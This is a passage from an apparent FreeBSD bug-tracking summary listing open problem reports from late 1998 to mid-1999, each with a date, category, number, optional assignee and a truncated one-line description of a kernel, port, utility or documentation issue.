kern/8605 ipsec for ipv4, new version o [1998/11/08] ports/8620 asami New option to colorls - -K, color only to o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this s [1998/11/12] kern/8661 stb sys/netatalk/at_control.c needs to correc o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/13] gnu/8679 tar man page should be updated o [1998/11/14] bin/8681 other macro name that has same number is o [1998/11/15] kern/8703 NFS Freezes when copying files from 3.0 t o [1998/11/18] ports/8754 se KDE: KDM Display Manager has login proble o [1998/11/18] bin/8756 'pw' command additional feature request o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/22] bin/8809 fdisk calls QNX-4 partitions unknown o [1998/11/22] bin/8811 Problem to use 'NLSMODE' variable in Make a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1998/11/27] i386/8867 /stand/sysinstall core dumps (signal 11) o [1998/11/28] bin/8881 billf mv missing verbose switch o [1998/11/29] kern/8895 DEC 21152 PCI-PCI bridge chip isn't probe o [1998/11/29] kern/8898 PCI devices without an associated driver o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] i386/8923 ctm 2.2.5 -> 2.2.7 error hu_HU.ISO_8859- o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/03] i386/8953 BINFORMAT not defined in 2.2-STABLE o [1998/12/03] bin/8955 request CVS allow advisory locks on repos o [1998/12/04] kern/8960 lnc driver does not set IFF_MULTICAST o [1998/12/06] misc/8986 install-info breaks installworld over nfs o [1998/12/06] bin/8989 (patch) chflags support for mtree(8) o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/10] conf/9051 2.2.8R boot floppy won't write to fixit f o [1998/12/11] bin/9055 When used without arguments, ``set'' and a [1998/12/12] bin/9064 n_hibma [PATCH] propose adding `direct' option in o [1998/12/14] bin/9078 tunefs cant access mounted devices (vs. m o [1998/12/15] kern/9092 DELF raid volumes cause panics under CAM o [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/17] bin/9118 default install of aout compat libs is in o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/20] ports/9150 nate Ports depending on jdk need to know where o [1998/12/21] conf/9160 /etc/services file corruption o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/23] kern/9183 newton chroot(2) can be broken by the superuser. o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() o [1998/12/27] bin/9206 sysinstall installation should create /st f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/28] bin/9226 telnetd can log wrong IP address to utmp o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1998/12/30] conf/9245 obsolete locale setting in /usr/src/etc/{ o [1998/12/30] conf/9246 allscreens_flags in /etc/rc.conf not work o [1998/12/30] bin/9250 [PATCH] allow fetch to do ftp directory l o [1998/12/31] i386/9257 fpathconf() missing from libc_r o [1998/12/31] bin/9259 allow no prompt for yes in fdformat, but o [1999/01/02] bin/9281 awk asumes memory that is returned from m o [1999/01/03] i386/9283 ioctl(SNDCTL_DSP_SETFMT) on /dev/audio (p o [1999/01/03] ports/9286 andreas Patch for games/nethack-qt to fix compila o [1999/01/03] ports/9289 kris New Port - ASPostit (Dockable version of f [1999/01/03] bin/9292 n_hibma Cron's logs are in /var/cron, not /var/lo o [1999/01/04] kern/9316 Intel PILA8461 NIC panics 2.2.7 during pr o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/05] i386/9341 tty-level buffer overflows o [1999/01/06] docs/9352 hoek wrong macro names in groff_[ms|mm|mmse].7 o [1999/01/07] bin/9374 Improved functionality for find(1) o [1999/01/08] conf/9388 magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl f [1999/01/10] ports/9425 se KDE starting up from xdm has problem.... o [1999/01/13] bin/9470 aout-to-elf-build broken with kerberosIV- o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/14] ports/9508 andreas Update majorcool to current version 1.3.2 o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/17] bin/9536 make world installs aout compat libs in t o [1999/01/19] bin/9569 top(1) ignores tty EOF condition. o [1999/01/19] kern/9570 ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] misc/9582 configApache command doesn't work for /st o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts a [1999/01/24] ports/9657 ports Progressive Networks' RealAudio proxy por o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] kern/9764 allow /bin/df not to list certain entries o [1999/01/28] bin/9770 An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/29] misc/9778 Need to handle conflicting pthread.h and o [1999/01/29] ports/9786 cwt tk80 port doesn't create man page links o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/30] ports/9792 msmith pib coredumps in port maker mode o [1999/01/30] ports/9795 obrien The Handbook is not clear on how to deal o [1999/01/30] bin/9809 finger output format wrong f [1999/01/30] ports/9811 nectar New port: lang/gnomeguile o [1999/01/30] ports/9812 nectar New port: devel/libgtopbindings o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/01/31] conf/9845 Propose adding options to rc.conf and rc. o [1999/01/31] kern/9848 ARP proxyall extra sanity check o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/01] kern/9877 Patch to remove some kernel compile warni o [1999/02/01] kern/9878 Some patches to remove compiler warnings o [1999/02/03] bin/9893 NFS umount of regular file impossible o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/05] ports/9921 peter exmh2 ports update o [1999/02/06] bin/9931 config gives misleading error when duplic o [1999/02/07] ports/9954 ports new port devel/ACE o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] gnu/9987 jdp wrong (for FreeBSD) ELF_DYNAMIC_INTERPRET o [1999/02/09] bin/9990 Enhancement to filename completeion in cs o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/09] ports/9993 kris New Port - graphics/libunfig o [1999/02/09] ports/9998 kris New port - graphics/mtv (MpegTV player) o [1999/02/10] i386/10004 jkh instalation of current version from FTP s o [1999/02/10] ports/10007ports Port of the mercury compiler version 0.8 o [1999/02/11] ports/10023kris New port - net/gtkcookie o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/12] i386/10052 Matrox Millennium II AGP device/model id o [1999/02/14] kern/10077 sheldonh dd'ing a ccd stripped partition sometimes o [1999/02/14] docs/10085 doc NIS Setup Tutorial o [1999/02/14] kern/10095 missing VGA description o [1999/02/14] docs/10098 doc Lack of overall guide for NIS setup o [1999/02/15] gnu/10112 /usr/src/gnu/usr.bin/patch sorely out of a [1999/02/15] conf/10115 sheldonh /etc/login.conf still implies LOGIN_CAP_A o [1999/02/16] kern/10116 acd driver patch to support PD/CD drive. o [1999/02/16] ports/10124ports UNIX|STAT pr submission failed to include o [1999/02/17] ports/10129torstenb mirror/patch-ac sets /usr/local/bin/perl5 f [1999/02/17] bin/10131 n_hibma bug in strptime(3) o [1999/02/18] docs/10146 jkh Release Notes and LINT for 3.1 include ha o [1999/02/18] kern/10149 New PCI device o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10159 Unable to unload vinum module o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/19] ports/10162se Fix kdmrc to add qmail usernames to NoUse o [1999/02/19] misc/10167 Upon exiting X11R6, monitor goes blank. o [1999/02/20] bin/10169 find -perm doesn't allow a bitwise o [1999/02/20] kern/10175 Bridging support incomplete for some netc o [1999/02/21] ports/10178torstenb USE_SOCKS=YES option broken for security/ o [1999/02/22] ports/10196torstenb Better startup scripts for ssh o [1999/02/22] ports/10215rvb net/coda_client and net/coda_server o [1999/02/23] ports/10227peter wrong sendmail path in rdist6-port s [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 doc We need a script which check if our web m o [1999/02/25] conf/10244 100 character limit on any pathname in sy o [1999/02/25] kern/10255 Some more SiS chipset PCI IDs for chipset o [1999/02/26] bin/10274 make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/02/28] bin/10300 dmesg exits on signal 10 o [1999/03/01] misc/10325 Implementation of itoa() for libc o [1999/03/01] bin/10342 putenv(3) unnecessarily calls strdup/free o [1999/03/01] misc/10349 For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames o [1999/03/05] ports/10396asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage o [1999/03/07] i386/10465 Must disable ex0 to install. o [1999/03/07] ports/10477ports The fakemail in lib-src fails to link (ne o [1999/03/08] bin/10493 ipfw's undocumented feature s [1999/03/09] bin/10508 obrien isc-dhcp puts garbage to text options, V2 o [1999/03/10] bin/10522 make world died due -Werror o [1999/03/10] bin/10524 3.1-19990309-STABLE install problem o [1999/03/10] ports/10532ports Port of GNU Pascal o [1999/03/10] kern/10537 extraneous verbose output from cam_xpt.c o [1999/03/10] bin/10538 sbin/nos-tun gives wrong usage message o [1999/03/11] bin/10546 Intel Pro/100 PC card has CIS string > CI o [1999/03/11] bin/10548 More useful default ifconfig behaviour sa o [1999/03/12] gnu/10555 jraynard [PATCH] awk dumps core o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] bin/10568 obrien dhcp client receives garbage (dhclient pr o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/14] bin/10590 new option to silince confirmation but no o [1999/03/14] i386/10595 [PATCH] spanish language support for vidf o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10606 Probablue odd error message if LS-120 is o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/16] bin/10622 vi does not display Russian characters pr o [1999/03/16] i386/10623 DFLTPHYS in /usr/src/sys/i386/include/par o [1999/03/16] ports/10634ports Update the hylafax port to do a client in o [1999/03/17] ports/10639rse ports/web/wml must be upgraded and unbrok o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/17] kern/10642 exports(5) mentions KERBNFS but that's no o [1999/03/18] bin/10657 Unable to install from CDROM or DOS parti o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] docs/10664 doc Notes on 2.2.8 -> 3.1 migration o [1999/03/18] misc/10667 Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/22] kern/10728 sos WCD driver does not recognize a recovered o [1999/03/22] ports/10734pst Update of gdb port to 4.17 o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/23] i386/10766 obsolete device name wcd is still left un o [1999/03/24] i386/10779 zp slot 0 sees 3Com 589 PCMCIA card but z o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 whois(1) client enchancements a [1999/03/26] misc/10804 billf whois(1) enhancement o [1999/03/26] ports/10806phk Update net/scotty to 2.1.10 o [1999/03/26] kern/10812 LINT configuration MAXDSIZ/DFLDSIZ mislea o [1999/03/26] ports/10813ports crossgo32 brokeness o [1999/03/27] bin/10825 daily script not executed or executed twi o [1999/03/28] docs/10840 jkh [PATCH] Add pcic double-loading bug fix t f [1999/03/28] ports/10844ports New port: adagdb o [1999/03/29] docs/10850 doc submitting a documentation change for sed o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/29] kern/10860 bpf overwrites source ethernet addresses o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/30] bin/10878 host(1) dumps core o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] bin/10905 sa(8) is hard coded for 8 character user o [1999/04/01] gnu/10910 Integration of Objective C patches into g o [1999/04/02] ports/10916ports new port biology/molmol again f [1999/04/02] bin/10921 green I wished from(1) would count the number o o [1999/04/02] bin/10923 /usr/bin/cpp is an out-of-date wrapper fo o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/04] ports/10945jmz X11 "sessreg" program does not update /va o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/06] bin/10992 pthread_kill() doesn't deliver signals to o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/07] i386/11006 Sysinstall silently makes FreeBSD's parti o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] ports/11029ports Configure scripts for non ported applicat o [1999/04/08] bin/11031 [PATCH] mount and umount support for mort o [1999/04/08] bin/11032 h2ph's cpp #warning/#error directive proc o [1999/04/08] ports/11034ports New ports of crazywwwboardle o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048obrien variable not initialized in fwtk-lib lead o [1999/04/09] bin/11051 ps's -U option should accept a list of us o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/12] kern/11109 ipfw.ko Makefile contains CFLAGS+= -DDIVE o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 make(1) does not work as documented with f [1999/04/13] bin/11121 green w(1) cannot handle more than one user on o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/14] ports/11138jmz New version of Xevil 2.01, I created a po o [1999/04/14] bin/11141 u_long is not big enough o [1999/04/15] misc/11149 Web page entry for BAFUG is incorrect o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 o [1999/04/16] bin/11168 pw(8) usermod does not recognize -w flag o [1999/04/16] kern/11178 [PATCH] minor fix to /usr/include/sys/mbu o [1999/04/18] i386/11201 brian mktime possible bug o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/18] i386/11207 sys/i386/isa/rp.c: fixed breaking and war o [1999/04/19] kern/11222 MFS does not sync from reboot syscall o [1999/04/20] kern/11235 Need to submit new driver o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/21] docs/11258 doc suggestion to refine npx.4 o [1999/04/21] ports/11264chuckr a2ps-letter port installs non-listed liba o [1999/04/21] ports/11270jfitz Update to the rexx-imc port o [1999/04/22] kern/11287 rfork(RFMEM...) doesn't share LDTs set by o [1999/04/22] misc/11289 makeflp.bat suggestion: create "kernel" d o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/25] misc/11316 [PATCH] HTTP proxy support for sysinstall o [1999/04/27] ports/11353asami Feature additions to bsd.port.mk. o [1999/04/27] ports/11354jmz Port fix: x11/XFree86 o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/28] bin/11370 more segfaults if you give it a real file o [1999/04/28] misc/11373 errata.txt for 3.1 o [1999/04/29] misc/11383 $Id$ missing in some files in etc [PATCH] o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] ports/11388torstenb patch for ircII so /window create works o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11410 code typo in ad1848.c: the != operator ha o [1999/04/30] kern/11411 code typo in clones.c: "if ((mpu_config = o [1999/04/30] kern/11412 code typo in ip_fil.c: missing NULL check o [1999/04/30] kern/11413 code typo in pci.c: the != operator has h o [1999/04/30] kern/11414 code typo in pcf.c: the != operator has h o [1999/04/30] kern/11415 code typo in wst.c: the != operator has h o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/04/30] ports/11421jfitz upgrade p5-Date-Manip 5.33 -> 5.34 o [1999/05/01] ports/11430se incorrect int type causes floating point o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/02] ports/11460erich Update to the xlispstat port o [1999/05/03] ports/11468foxfair New port: xcin-devel o [1999/05/03] misc/11478 Non-functional AFS support in KerberosIV o [1999/05/04] ports/11504chuckr Update ports math/octave o [1999/05/05] ports/11510nik new version of www/sitecopy (0.6.0) o [1999/05/05] kern/11516 NetGear 10/100 Ethernet 21140-based Ether o [1999/05/05] kern/11517 ../../kern/kern_ntptime.c:533: warning: i o [1999/05/05] kern/11518 ../../pci/if_tx.c:1376: warning: no previ o [1999/05/05] kern/11519 dead code in ncr driver o [1999/05/06] bin/11552 sendmail local delivery (mail.local) can' o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/07] misc/11569 Automatically run fsck when the file syst o [1999/05/08] ports/11581fenner netperf port - rfc1644 forgotten o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611billf Update port: net/ntop a [1999/05/09] docs/11615 chris Handbook: linux emulation documentation o o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/10] conf/11626 /var/log/kerberos is rotated o [1999/05/10] bin/11637 build of kdump fails o [1999/05/11] ports/11652ports New port (net/dictd) o [1999/05/11] misc/11653 obrien patch to allow DHCP configuration of inte o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] i386/11674 can't do make imake build or anything sin o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] ports/11743torstenb inn-2.2 (nonfatal) premature stop of buil o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] ports/11786kuriyama gnupg-0.9.6 port does not install o [1999/05/19] misc/11788 booting problems o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/20] misc/11812 ftp5.freebsd.org can't find giflib-3.0 an o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] ports/11820asami bsd.port.subdir.mk does not define the `m o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/22] ports/11840asami Feature fixup: bsd.port.mk o [1999/05/24] ports/11879ports dclock's "-miltime" option and "*miltime" o [1999/05/24] kern/11881 when a dummynet pipe is encountered it st o [1999/05/25] misc/11890 make world creates /lkm directory o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/27] conf/11905 sysinstall desktop changing inconvenience o [1999/05/28] bin/11914 makewhatis during installworld uses /usr/ o [1999/05/28] i386/11920 FBSD 3.2 upgrade claims not to upgrade /u o [1999/05/28] i386/11921 /usr/X11R6/lib/aout libraries screwed up o [1999/05/29] conf/11925 rc.conf cosmetic naming inconsistencies o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] ports/11963ports should update the ocaml-tk module and ins o [1999/05/31] ports/11964jmacd lang/STk port needs to be updated to STk- o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] docs/11978 doc timed(8) manpage does not define '-F' swi o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/01] kern/11982 Three cleanup fixes for uthreads o [1999/06/02] conf/11989 pppd(8) output misplaced o [1999/06/02] bin/11997 Enhancement for lpr o [1999/06/02] ports/12001ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] misc/12013 patch for 12012 o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/04] conf/12026 /etc/rc.diskless1 refrences non-existant o [1999/06/05] misc/12044 having tcl.h in /usr/local/include:/usr/i o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/06] kern/12053 fixes a few aio bugs, makes socket io bet o [1999/06/06] ports/12056ache [PATCH] hpack install files always in /us o [1999/06/06] ports/12057markm Perl5 library builds do not honour PREFIX o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/10] ports/12121obrien Update: mail/mutt o [1999/06/11] ports/12138imp net/socks5 port broken with regards to pa o [1999/06/12] ports/12150ports New Ports: audio/timidity++ o [1999/06/12] ports/12151ports New Ports: audio/timidity++-emacs o [1999/06/12] ports/12152ports New Ports: audio/timidity++-gtk o [1999/06/12] ports/12154ports New Ports: audio/timidity++-slang o [1999/06/12] ports/12155ports New Ports: audio/timidity++-motif o [1999/06/12] ports/12156ports New Ports: audio/timidity++-tcltk o [1999/06/12] ports/12157ports New Ports: audio/timidity++-xaw o [1999/06/12] ports/12158ports New Ports: audio/timidity++-xskin o [1999/06/12] ports/12160ports New Ports: japanese/timidity++-slang o [1999/06/12] ports/12161ports New Ports: japanese/timidity++-tcltk o [1999/06/13] ports/12188ports new port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195ports submission of new port pgpenvelope o [1999/06/14] ports/12204ports Update port: graphics/EZWGL o [1999/06/14] misc/12209 termcap: "xterm" entry defines bogus capa o [1999/06/14] ports/12213ports [PATCH] benchmarks/netperf installs into o [1999/06/15] misc/12228 /etc/security don't search in all the fil o [1999/06/15] bin/12232 Dangling text on #endif causes cpp noise. o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] kern/12241 jkh Req: GENERIC includes bpf device o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/16] misc/12252 netstat fails to display TCP connectoins o [1999/06/17] bin/12255 BIND 8.1.2 compilation error in IPv6 capa o [1999/06/17] kern/12258 Tuning the FM radio on new -Theatre serie o [1999/06/17] bin/12263 hoek "more" problems with long filenames f [1999/06/17] misc/12268 n_hibma weekly/catman will not work o [1999/06/18] ports/12271ports fix pkg_add with error message and add ne o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/18] misc/12285 [PATCH] /usr/share/dict/web2a is missing o [1999/06/19] ports/12300ports port update: lang/tya o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc f [1999/06/22] ports/12341ports New port tclreadline o [1999/06/22] conf/12342 /etc/hosts.allow must use numerical IP ad o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only o [1999/06/23] bin/12358 Patch: "camcontrol help" should go to std o [1999/06/23] ports/12366billf finish the port for misc/mprime o [1999/06/23] ports/12368ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/23] bin/12375 mv(1) cannot inherit the file flags. o [1999/06/24] misc/12376 When mounting NFS dirs, /etc/rc doesn't g o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/25] kern/12385 jdp Patch to add bridging support to if_vr.c o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/26] ports/12403ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406ports New port for the LAM implementation of th o [1999/06/27] kern/12409 add some more chipset models by NVidia to o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/06/29] ports/12447ports new port : x11-toolkit/pike-Gtk o [1999/06/29] ports/12456chuckr graphics/xpdf: small fixes o [1999/06/30] bin/12461 it's handy to be able to send syslog mess o [1999/06/30] bin/12467 wollman ac(8) does not accept input from stdin o [1999/07/01] kern/12475 ctrl,shift,alt keys can be used as alock o [1999/07/01] bin/12477 New fortune o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/02] ports/12490ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492ports port misc/diction should be moved to text o [1999/07/03] kern/12495 3.1 install fails to detect Toshiba CDROM o [1999/07/03] ports/12503ports New Port: Willows toolkit (developers rel o [1999/07/04] ports/12513ports New ports: japanese/dbskkd-cdb o [1999/07/04] ports/12515jfitz p5-Apache/scripts/install_httpd needs fix o [1999/07/05] ports/12518ports new port: ifmail-os-2.14.7 o [1999/07/05] ports/12522ports New port: cos o [1999/07/05] ports/12523ports New port: jdbcpool o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] ports/12530peter squid22 port with --enable-ipf-transparen o [1999/07/06] ports/12536ports New port: lang/cu-prolog o [1999/07/06] kern/12543 [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/07] ports/12548asami New 'fecth-recursive(-list)' targets in p o [1999/07/07] ports/12549ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571ports Xfig port doesn't have Ghostscript suppor f [1999/07/11] kern/12594 sheldonh wrong sysctl descriptions f [1999/07/11] ports/12596torstenb pidentd is unstable in 3.2 and 4.0 o [1999/07/11] ports/12604peter New port version: transproxy 1.0 o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr s [1999/07/12] bin/12611 sheldonh /usr/bin/jot crashes with floating point o [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/12] ports/12618ache poor trouble reporting by qpopper's pop_i o [1999/07/13] ports/12624ports New version of mxv which also works with o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] conf/12650 No card in /etc/pccard.conf.sample (coreg o [1999/07/15] ports/12654pst gnats port failes on "make install" o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/15] ports/12656ports new port - gnujsp o [1999/07/16] ports/12661ports new port: riva-glx (3d hardware accelerat o [1999/07/16] ports/12666ports New port: kcd-4.7.10 o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/16] ports/12674nik textproc/docproj port has an invalid depe o [1999/07/16] ports/12675chuckr [PATCH] textproc/sp port installs config. o [1999/07/16] docs/12679 dcs splash(4) contains incorrect references o [1999/07/18] ports/12690ports New port: gperiodic-1.2.1 o [1999/07/18] ports/12692ports new port: gnome-vnc-0.1 o [1999/07/18] ports/12696ports new port: gmessage-0.2 o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/18] ports/12698ports new port: grun-0.8.1 o [1999/07/18] ports/12699ports new port: gnofin-0.5.10 o [1999/07/18] ports/12700jmz Errors in mtools.conf file o [1999/07/19] ports/12708ports New port: www/bacon o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] ports/12721brian Leafnode 1.9.4 has enhancements and bug f o [1999/07/20] ports/12722ports new port: AT&T's DjVu library for scanned o [1999/07/20] kern/12723 